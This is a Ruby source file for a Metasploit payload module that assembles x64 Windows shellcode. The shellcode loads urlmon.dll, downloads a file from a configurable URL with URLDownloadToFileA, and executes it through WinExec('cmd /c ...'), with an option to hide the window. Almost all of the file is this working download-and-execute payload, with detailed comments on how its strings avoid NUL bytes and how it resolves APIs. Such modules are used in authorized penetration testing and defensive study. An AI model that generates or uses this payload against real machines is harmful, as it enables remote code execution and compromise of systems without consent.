# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Byte size of the payload as generated with the default options; the
  # framework keeps this cached value for its payload-size checks.
  CachedSize = 353

  include Msf::Payload::Single
  include Msf::Payload::Windows
  # Supplies +asm_block_api+, the hash-based API resolver stub that every
  # +call rbp+ in the assembly below goes through.
  include Msf::Payload::Windows::BlockApi_x64

  # Registers the module metadata and its three user-facing options:
  #   URL      - location the file is fetched from (URLDownloadToFileA).
  #   FILEPATH - local path the download is written to and then executed.
  #   DISPLAY  - HIDE or SHOW; selects the WinExec window mode (see #generate).
  #
  # @param info [Hash] module info merged by +update_info+.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Download Execute',
        'Description' => 'Downloads and executes the file from the specified url.',
        'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64
      )
    )

    # First entry doubles as the default for the DISPLAY enum.
    display_options = %w[HIDE SHOW]

    register_options(
      [
        OptString.new('URL', [true, 'The url to download the file from.', 'http://localhost/hi.exe']),
        OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.exe']),
        OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
      ]
    )
  end

  # Assembles the x64 shellcode and returns it as a raw byte String.
  #
  # Layout, in execution order. Each stage reaches the next with
  # +call label+ / +pop reg+, so the popped return address points at the
  # inline +db+ string that directly follows the +call+:
  #   1. block-API resolver stub (+asm_block_api+), its address kept in rbp
  #   2. LoadLibraryA("urlmon.dll")
  #   3. URLDownloadToFileA(NULL, URL, FILEPATH, 0, NULL)
  #      (rcx, rdx, r8, r9, then the fifth argument pushed on the stack)
  #   4. WinExec("cmd /c <FILEPATH>", uCmdShow) - uCmdShow chosen by DISPLAY
  #   5. optional ExitProcess / ExitThread stub chosen by EXITFUNC
  #
  # Every inline string ends in a non-NUL sentinel byte ('K', 'A', 'C', 'F')
  # instead of a terminator; at run time the code XORs that byte with itself
  # to turn it into NUL, presumably to keep literal NUL bytes out of the
  # emitted shellcode. The XOR offsets are computed from +url.length+ and
  # +file.length+; the +7 in the WinExec stage is the length of "cmd /c ".
  #
  # Note for defenders: the observable behaviour is LoadLibraryA of
  # urlmon.dll, URLDownloadToFileA writing FILEPATH to disk, and WinExec of
  # "cmd /c <FILEPATH>" from the injected process.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single interface.
  # @return [String] assembled shellcode bytes.
  def generate(_opts = {})
    # Fallbacks mirror the option defaults registered in #initialize.
    url = datastore['URL'] || 'http://localhost/hi.exe'
    file = datastore['FILEPATH'] || 'fox.exe'
    display = datastore['DISPLAY'] || 'HIDE'

    # Assembly source. Ruby interpolation fills in the API hashes and the
    # terminator offsets; the literal's contents, including its ';' comments,
    # are handed to the assembler unchanged.
    payload = %^
cld
and rsp, -16
call main
#{asm_block_api}

main:
pop rbp
call LoadLibrary
db "urlmon.dllK"

LoadLibrary:
pop rcx ; rcx points to the dll name.
xor byte [rcx+10], 'K' ; null terminator
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA("urlmon.dll")
; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.

SetUrl:
call SetFile
db "#{url}A"

SetFile:
pop rdx ; 2nd argument
xor byte [rdx+#{url.length}], 'A' ; null terminator
call UrlDownloadToFile
db "#{file}C"

UrlDownloadToFile:
pop r8 ; 3rd argument
xor byte [r8+#{file.length}], 'C' ; null terminator
xor rcx,rcx ; 1st argument
xor r9,r9 ; 4th argument
sub rsp, 8
push rcx ; 5th argument
mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
call rbp

SetCommand:
call Exec
db "cmd /c #{file}F"

Exec:
pop rcx ; 1st argument
xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}
xor rdx, rdx ; 2nd argument
^

    # WinExec's uCmdShow is rdx, zeroed above (SW_HIDE = 0). SHOW bumps it to
    # SW_NORMAL = 1 before the call; HIDE just issues the call.
    if display == 'HIDE'
      hide = %(
call rbp
)
      payload << hide

    elsif display == 'SHOW'
      show = %(
inc rdx ; SW_NORMAL = 1
call rbp
)
      payload << show
    end

    # EXITFUNC is registered by Msf::Payload::Windows. Only 'process' and
    # 'thread' get an exit stub appended here; other values add nothing.
    if datastore['EXITFUNC'] == 'process'
      exit_asm = %(
xor rcx,rcx
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
call rbp
)
      payload << exit_asm

    elsif datastore['EXITFUNC'] == 'thread'
      exit_asm = %(
xor rcx,rcx
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
call rbp
)
      payload << exit_asm
    end

    # Assemble the text above into raw machine-code bytes.
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
end